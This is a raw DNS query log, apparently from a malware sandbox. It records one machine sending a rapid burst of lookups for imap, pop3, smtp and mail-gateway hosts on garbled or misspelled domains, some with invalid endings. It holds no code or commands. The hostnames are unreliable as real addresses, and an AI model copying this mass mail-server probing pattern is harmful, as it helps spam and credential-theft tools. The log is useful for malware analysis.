Nov 30, 2023 11:22:43.891916990 CET	192.168.2.4	1.1.1.1	0xc10f	Standard query (0)	imap.oa.lagdfillemlmlml00xydurail.jkeziac.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.892858028 CET	192.168.2.4	1.1.1.1	0xce25	Standard query (0)	imap.m0bhfhblezlsl1.co.tv	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.893280983 CET	192.168.2.4	1.1.1.1	0x2152	Standard query (0)	imap.acooil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.894735098 CET	192.168.2.4	1.1.1.1	0x4b63	Standard query (0)	imap.buromaril.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.907015085 CET	192.168.2.4	1.1.1.1	0x4a8f	Standard query (0)	imap.hl.comuk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.945112944 CET	192.168.2.4	1.1.1.1	0x3d8c	Standard query (0)	pop.1rz.ramal.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.945791960 CET	192.168.2.4	1.1.1.1	0x6f9e	Standard query (0)	pop3.f.nyhm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.974239111 CET	192.168.2.4	1.1.1.1	0xbdff	Standard query (0)	pop3.23xd5a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.975205898 CET	192.168.2.4	1.1.1.1	0xaaf0	Standard query (0)	imap.nnblmogblmoglil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.975507975 CET	192.168.2.4	1.1.1.1	0xcb69	Standard query (0)	pop3.gmdcblil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.975667000 CET	192.168.2.4	1.1.1.1	0xa44a	Standard query (0)	pop3.feoio.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.983110905 CET	192.168.2.4	1.1.1.1	0x4766	Standard query (0)	pop.a0i.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.983110905 CET	192.168.2.4	1.1.1.1	0x398f	Standard query (0)	mailgate.yahcl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.983110905 CET	192.168.2.4	1.1.1.1	0xac46	Standard query (0)	imap.a0i.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.985944986 CET	192.168.2.4	1.1.1.1	0x637	Standard query (0)	imap.feoio.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.040101051 CET	192.168.2.4	1.1.1.1	0x9d7a	Standard query (0)	imap.rknsieiwn.ail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.040523052 CET	192.168.2.4	1.1.1.1	0xa76	Standard query (0)	pop3.fldie12.jdgwcollfaaba.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.046920061 CET	192.168.2.4	1.1.1.1	0x6b75	Standard query (0)	mail.gmdcblil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.052385092 CET	192.168.2.4	1.1.1.1	0x54e9	Standard query (0)	mail.osrniamadvea.lrhzda.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.052799940 CET	192.168.2.4	1.1.1.1	0x29ee	Standard query (0)	mailgate.ytcjmiil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.053529978 CET	192.168.2.4	1.1.1.1	0x8038	Standard query (0)	imap.e.gr	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.053781033 CET	192.168.2.4	1.1.1.1	0x1404	Standard query (0)	imap.wn26lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.054761887 CET	192.168.2.4	1.1.1.1	0xced5	Standard query (0)	pop3.gmaigcmar19l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.054761887 CET	192.168.2.4	1.1.1.1	0x536	Standard query (0)	imap.gmaiuilil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.054763079 CET	192.168.2.4	1.1.1.1	0xf286	Standard query (0)	imap.yahfll.ianus	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.055495024 CET	192.168.2.4	1.1.1.1	0xea60	Standard query (0)	imap.domo5ho.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.055495024 CET	192.168.2.4	1.1.1.1	0x6be9	Standard query (0)	imap.1rz.ramal.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.056430101 CET	192.168.2.4	1.1.1.1	0x2a08	Standard query (0)	qhlil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.056430101 CET	192.168.2.4	1.1.1.1	0xdbad	Standard query (0)	mail.fldie12.jdgwcollfaaba.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.057013988 CET	192.168.2.4	1.1.1.1	0x2068	Standard query (0)	mail.23xd5a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.057014942 CET	192.168.2.4	1.1.1.1	0xeedd	Standard query (0)	pop3.osrniamadvea.lrhzda.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.093265057 CET	192.168.2.4	1.1.1.1	0x9191	Standard query (0)	pop3.7.dceilil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.095184088 CET	192.168.2.4	1.1.1.1	0xd841	Standard query (0)	pop3.as.hauet	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.095184088 CET	192.168.2.4	1.1.1.1	0x1372	Standard query (0)	relay.gtblil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.095184088 CET	192.168.2.4	1.1.1.1	0x71dd	Standard query (0)	imap.t-yil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.135344028 CET	192.168.2.4	1.1.1.1	0x1030	Standard query (0)	imap.rhacmtu.au	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.138262033 CET	192.168.2.4	1.1.1.1	0x6f5f	Standard query (0)	pop3.kni.ol168.ecom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.138262033 CET	192.168.2.4	1.1.1.1	0x3339	Standard query (0)	imap.hgaarnlundejl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.138262033 CET	192.168.2.4	1.1.1.1	0xda92	Standard query (0)	mailgate.yahpn.yb	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.138686895 CET	192.168.2.4	1.1.1.1	0x64be	Standard query (0)	mail.he0114zusmg454lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.138686895 CET	192.168.2.4	1.1.1.1	0xce25	Standard query (0)	imap.m0bhfhblezlsl1.co.tv	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.140372992 CET	192.168.2.4	1.1.1.1	0xfeab	Standard query (0)	imap.kni.ol168.ecom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.140372992 CET	192.168.2.4	1.1.1.1	0xeb2d	Standard query (0)	smtp.yahgr.neaco	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.140372992 CET	192.168.2.4	1.1.1.1	0xa335	Standard query (0)	imap.h333ol03t8rwslive21lok.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.142667055 CET	192.168.2.4	1.1.1.1	0xc0dd	Standard query (0)	mail.hot13l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.142667055 CET	192.168.2.4	1.1.1.1	0xeccc	Standard query (0)	mail.phcg87k6barre352odseba.dcivenail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.142667055 CET	192.168.2.4	1.1.1.1	0x4d46	Standard query (0)	pop3.loaquorezcil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.143857002 CET	192.168.2.4	1.1.1.1	0x4652	Standard query (0)	mail.h333ol03t8rwslive21lok.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.163377047 CET	192.168.2.4	1.1.1.1	0xa712	Standard query (0)	mail.yahpn.yb	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.164201021 CET	192.168.2.4	1.1.1.1	0x9317	Standard query (0)	pop3.qhlil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.164455891 CET	192.168.2.4	1.1.1.1	0xa3c9	Standard query (0)	imap.deptka7ffmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.211286068 CET	192.168.2.4	1.1.1.1	0x42f0	Standard query (0)	imap.tload.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.211287022 CET	192.168.2.4	1.1.1.1	0x37e7	Standard query (0)	imap.lyco2.comom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.212567091 CET	192.168.2.4	1.1.1.1	0x4b45	Standard query (0)	pop3.qebyte.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.212567091 CET	192.168.2.4	1.1.1.1	0xef0d	Standard query (0)	imap.asail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.213023901 CET	192.168.2.4	1.1.1.1	0x5f48	Standard query (0)	pop3.wn26lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.213731050 CET	192.168.2.4	1.1.1.1	0x56a4	Standard query (0)	imap.loaquorezcil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.214353085 CET	192.168.2.4	1.1.1.1	0x71e3	Standard query (0)	mail.comcamm.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.214353085 CET	192.168.2.4	1.1.1.1	0xd7fd	Standard query (0)	imap.yahao.lsa	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.220166922 CET	192.168.2.4	1.1.1.1	0x2222	Standard query (0)	mailgate.tbsayail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.222110033 CET	192.168.2.4	1.1.1.1	0xe706	Standard query (0)	mail.comcaci.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.222223043 CET	192.168.2.4	1.1.1.1	0x85e6	Standard query (0)	getococuail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.250487089 CET	192.168.2.4	1.1.1.1	0xbbaa	Standard query (0)	imap.qebyte.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.254292011 CET	192.168.2.4	1.1.1.1	0xac46	Standard query (0)	imap.a0i.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.255362988 CET	192.168.2.4	1.1.1.1	0x6c7e	Standard query (0)	relay.gbivlporollm.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.259294033 CET	192.168.2.4	1.1.1.1	0x862f	Standard query (0)	imap.yahe.nen	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.259831905 CET	192.168.2.4	1.1.1.1	0xae4f	Standard query (0)	imap.yahnt.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.265264034 CET	192.168.2.4	1.1.1.1	0xd690	Standard query (0)	imap.hotmea1aia.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.267452955 CET	192.168.2.4	1.1.1.1	0x801f	Standard query (0)	mail.comcaio.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.267452955 CET	192.168.2.4	1.1.1.1	0xa1f8	Standard query (0)	imap.gez542l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.335161924 CET	192.168.2.4	1.1.1.1	0x987a	Standard query (0)	imap.qhlil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.357168913 CET	192.168.2.4	1.1.1.1	0x8038	Standard query (0)	imap.e.gr	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.357168913 CET	192.168.2.4	1.1.1.1	0x6b75	Standard query (0)	mail.gmdcblil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.357168913 CET	192.168.2.4	1.1.1.1	0x6be9	Standard query (0)	imap.1rz.ramal.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.357589006 CET	192.168.2.4	1.1.1.1	0x4a8b	Standard query (0)	pop3.daytonpubhocso.cog	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.357589006 CET	192.168.2.4	1.1.1.1	0x5332	Standard query (0)	imap.syn.lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.358273983 CET	192.168.2.4	1.1.1.1	0x6ea0	Standard query (0)	mail.syn.lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.359348059 CET	192.168.2.4	1.1.1.1	0xd3e5	Standard query (0)	pop3.zma51baya.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.359775066 CET	192.168.2.4	1.1.1.1	0x362c	Standard query (0)	pop3.cucumbnr.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.360403061 CET	192.168.2.4	1.1.1.1	0x7206	Standard query (0)	mail.as.hauet	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.360403061 CET	192.168.2.4	1.1.1.1	0x2611	Standard query (0)	imap.f.nyhm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.362034082 CET	192.168.2.4	1.1.1.1	0x3ea2	Standard query (0)	pop3.tload.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.362034082 CET	192.168.2.4	1.1.1.1	0xd894	Standard query (0)	imap.osrniamadvea.lrhzda.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.362034082 CET	192.168.2.4	1.1.1.1	0x7cba	Standard query (0)	imap.slyvor.as290a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.368956089 CET	192.168.2.4	1.1.1.1	0x2f70	Standard query (0)	mailgate.hot13l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.368956089 CET	192.168.2.4	1.1.1.1	0xd007	Standard query (0)	mail.s.ddo	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.370587111 CET	192.168.2.4	1.1.1.1	0x9372	Standard query (0)	mail.rhacmtu.au	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.370587111 CET	192.168.2.4	1.1.1.1	0x2eec	Standard query (0)	mail.f.nyhm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.370587111 CET	192.168.2.4	1.1.1.1	0x1b20	Standard query (0)	mail.gmaigcmar19l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.373843908 CET	192.168.2.4	1.1.1.1	0xc04c	Standard query (0)	imap.7.dceilil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.373843908 CET	192.168.2.4	1.1.1.1	0xb1c1	Standard query (0)	imap.yahgr.neaco	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.373843908 CET	192.168.2.4	1.1.1.1	0xd314	Standard query (0)	imap.sbcgloboo.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.374387980 CET	192.168.2.4	1.1.1.1	0x29e1	Standard query (0)	pop3.yahao.lsa	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.375253916 CET	192.168.2.4	1.1.1.1	0x4c64	Standard query (0)	imap.gtblil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.375317097 CET	192.168.2.4	1.1.1.1	0xbce	Standard query (0)	mailgate.phcg87k6barre352odseba.dcivenail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.376600981 CET	192.168.2.4	1.1.1.1	0xa3d2	Standard query (0)	mailgate.horadguc1995l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.376600981 CET	192.168.2.4	1.1.1.1	0x3f83	Standard query (0)	pop3.ezi.adompany.at	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.376600981 CET	192.168.2.4	1.1.1.1	0xc9f6	Standard query (0)	imap.getococuail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.376941919 CET	192.168.2.4	1.1.1.1	0xe2ed	Standard query (0)	imap.asgmaanxgdil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.377213955 CET	192.168.2.4	1.1.1.1	0xf7ee	Standard query (0)	imap.pyctl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.377432108 CET	192.168.2.4	1.1.1.1	0x23da	Standard query (0)	pop3.lyco2.comom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.382864952 CET	192.168.2.4	1.1.1.1	0xff12	Standard query (0)	pop3.yahe.nen	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.382864952 CET	192.168.2.4	1.1.1.1	0x36d5	Standard query (0)	pop3.ho10a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.382864952 CET	192.168.2.4	1.1.1.1	0x992c	Standard query (0)	pop3.ytcjmiil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.383871078 CET	192.168.2.4	1.1.1.1	0x5efc	Standard query (0)	pop3.jubo.cath	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.383871078 CET	192.168.2.4	1.1.1.1	0x2c90	Standard query (0)	pop3.syn.lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.384977102 CET	192.168.2.4	1.1.1.1	0xa140	Standard query (0)	pop3.oa.lagdfillemlmlml00xydurail.jkeziac.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.384977102 CET	192.168.2.4	1.1.1.1	0xad48	Standard query (0)	pop3.deptka7ffmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.385790110 CET	192.168.2.4	1.1.1.1	0x5f71	Standard query (0)	pop3.hgaarnlundejl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.385790110 CET	192.168.2.4	1.1.1.1	0xd153	Standard query (0)	pop3.gez542l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.385790110 CET	192.168.2.4	1.1.1.1	0xf723	Standard query (0)	imap.n.n.amdiu	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.386288881 CET	192.168.2.4	1.1.1.1	0x8f30	Standard query (0)	pop3.slyvor.as290a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.388501883 CET	192.168.2.4	1.1.1.1	0xead1	Standard query (0)	pop3.sbcglob4m.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.388501883 CET	192.168.2.4	1.1.1.1	0xa86	Standard query (0)	imap.e-fja8mso.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.388501883 CET	192.168.2.4	1.1.1.1	0x91b2	Standard query (0)	pop3.domo5ho.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.389477015 CET	192.168.2.4	1.1.1.1	0x2984	Standard query (0)	pop3.h2.spainvil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.389621973 CET	192.168.2.4	1.1.1.1	0x618	Standard query (0)	mailgate.comcaio.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.391503096 CET	192.168.2.4	1.1.1.1	0x39cf	Standard query (0)	imap.ezi.adompany.at	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.391503096 CET	192.168.2.4	1.1.1.1	0x721	Standard query (0)	mail.ee.idbo	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.391503096 CET	192.168.2.4	1.1.1.1	0xc520	Standard query (0)	mail.t-yil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.393265009 CET	192.168.2.4	1.1.1.1	0x35f3	Standard query (0)	mailgate.as.r.upze	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.423270941 CET	192.168.2.4	1.1.1.1	0xa9f5	Standard query (0)	imap.23xd5a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.467276096 CET	192.168.2.4	1.1.1.1	0x2689	Standard query (0)	pop3.ez786-lcolwicn.coofmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.467276096 CET	192.168.2.4	1.1.1.1	0xb995	Standard query (0)	pop3.acesineuiw.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.467528105 CET	192.168.2.4	1.1.1.1	0xc44c	Standard query (0)	mail.as.r.upze	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.468710899 CET	192.168.2.4	1.1.1.1	0x9c54	Standard query (0)	imap.mess.ck	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.468710899 CET	192.168.2.4	1.1.1.1	0xe1b4	Standard query (0)	pop3.aomttdl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.468710899 CET	192.168.2.4	1.1.1.1	0x54ec	Standard query (0)	tload.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.473783016 CET	192.168.2.4	1.1.1.1	0x9b90	Standard query (0)	pop3.yahfll.ianus	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.495575905 CET	192.168.2.4	1.1.1.1	0xb6f4	Standard query (0)	pop3.h4y.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.499059916 CET	192.168.2.4	1.1.1.1	0xf2c3	Standard query (0)	pop3.a.o.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.499418020 CET	192.168.2.4	1.1.1.1	0xa4b8	Standard query (0)	mailgate.caatholiomissa.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.532273054 CET	192.168.2.4	1.1.1.1	0x6573	Standard query (0)	pop3.ochcar.cin4g9tdamn.bagcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.534468889 CET	192.168.2.4	1.1.1.1	0x2534	Standard query (0)	pop3.acooil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.537261963 CET	192.168.2.4	1.1.1.1	0xa686	Standard query (0)	mail.gbivlporollm.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.544814110 CET	192.168.2.4	1.1.1.1	0x3af1	Standard query (0)	mailgate.gmaigcmar19l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.545305967 CET	192.168.2.4	1.1.1.1	0x966c	Standard query (0)	pop3.comcamm.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.545573950 CET	192.168.2.4	1.1.1.1	0x822	Standard query (0)	smtp.loaquorezcil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.545990944 CET	192.168.2.4	1.1.1.1	0xea28	Standard query (0)	imap.phcg87k6barre352odseba.dcivenail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.608851910 CET	192.168.2.4	1.1.1.1	0x4bd4	Standard query (0)	mailgate.zma51baya.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.610002995 CET	192.168.2.4	1.1.1.1	0x748	Standard query (0)	imap.ez786-lcolwicn.coofmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.610585928 CET	192.168.2.4	1.1.1.1	0x5cbe	Standard query (0)	pop3.geu015naryo-uail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.610966921 CET	192.168.2.4	1.1.1.1	0x2b44	Standard query (0)	pop3.buromaril.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.613513947 CET	192.168.2.4	1.1.1.1	0x20e1	Standard query (0)	pop3.ser711a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.613986015 CET	192.168.2.4	1.1.1.1	0x6d1d	Standard query (0)	mail.horadguc1995l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.616511106 CET	192.168.2.4	1.1.1.1	0x4502	Standard query (0)	imap.gmai76afmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.616761923 CET	192.168.2.4	1.1.1.1	0x6de7	Standard query (0)	mail.sbcglob4m.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.616926908 CET	192.168.2.4	1.1.1.1	0x6129	Standard query (0)	pop3.nnblmogblmoglil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.618138075 CET	192.168.2.4	1.1.1.1	0x806	Standard query (0)	imap.gmdcblil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.618841887 CET	192.168.2.4	1.1.1.1	0x86bd	Standard query (0)	imap.h2.spainvil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.619187117 CET	192.168.2.4	1.1.1.1	0x21d3	Standard query (0)	pop3.sgt9o.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.619299889 CET	192.168.2.4	1.1.1.1	0x7405	Standard query (0)	pop3.rambojoocta.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.619477034 CET	192.168.2.4	1.1.1.1	0xbf5f	Standard query (0)	pop3.wr.omt222lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.626626968 CET	192.168.2.4	1.1.1.1	0xaa51	Standard query (0)	relay.a.o.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.627134085 CET	192.168.2.4	1.1.1.1	0xf1e	Standard query (0)	smtp.yahjl.cxs	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.629081011 CET	192.168.2.4	1.1.1.1	0x247b	Standard query (0)	imap.mn.ch	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.629726887 CET	192.168.2.4	1.1.1.1	0x3eeb	Standard query (0)	pop3.gmaiuilil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.629935980 CET	192.168.2.4	1.1.1.1	0x9fa4	Standard query (0)	imap.klp.tn	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.630498886 CET	192.168.2.4	1.1.1.1	0x70ea	Standard query (0)	imap.yahwoooie2ampu.comsh	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.631191015 CET	192.168.2.4	1.1.1.1	0x3b63	Standard query (0)	mail.ytcjmiil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.631417990 CET	192.168.2.4	1.1.1.1	0x312c	Standard query (0)	pop3.asgmaanxgdil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.632231951 CET	192.168.2.4	1.1.1.1	0xab2a	Standard query (0)	imap.yahio.comcm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.673563004 CET	192.168.2.4	1.1.1.1	0x2c90	Standard query (0)	pop3.syn.lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.673628092 CET	192.168.2.4	1.1.1.1	0x4c64	Standard query (0)	imap.gtblil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.673664093 CET	192.168.2.4	1.1.1.1	0xa140	Standard query (0)	pop3.oa.lagdfillemlmlml00xydurail.jkeziac.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.674288034 CET	192.168.2.4	1.1.1.1	0x1e98	Standard query (0)	mailgate.comcaci.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.674587011 CET	192.168.2.4	1.1.1.1	0x8783	Standard query (0)	mail.sbcgloboo.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.674961090 CET	192.168.2.4	1.1.1.1	0xcdf1	Standard query (0)	imap.ho10a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.678143978 CET	192.168.2.4	1.1.1.1	0x8771	Standard query (0)	pop3.yahwoooie2ampu.comsh	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.678862095 CET	192.168.2.4	1.1.1.1	0x1e4b	Standard query (0)	imap.geu015naryo-uail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.679501057 CET	192.168.2.4	1.1.1.1	0xbb4b	Standard query (0)	imap.rambojoocta.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.681009054 CET	192.168.2.4	1.1.1.1	0xe5f1	Standard query (0)	relay.hotmea1aia.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.681200981 CET	192.168.2.4	1.1.1.1	0xf313	Standard query (0)	pop3.yahio.comcm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.681606054 CET	192.168.2.4	1.1.1.1	0xb57f	Standard query (0)	pop3.pyctl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.685087919 CET	192.168.2.4	1.1.1.1	0xa0ee	Standard query (0)	pop3.m0bhfhblezlsl1.co.tv	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.712095022 CET	192.168.2.4	1.1.1.1	0xf942	Standard query (0)	mailgate.yah23051987hont.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.712819099 CET	192.168.2.4	1.1.1.1	0xa1ee	Standard query (0)	imap.sgt9o.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.713232040 CET	192.168.2.4	1.1.1.1	0xa8e1	Standard query (0)	pop3.t.ahlfth	A (IP address)	IN (0x0001)	false
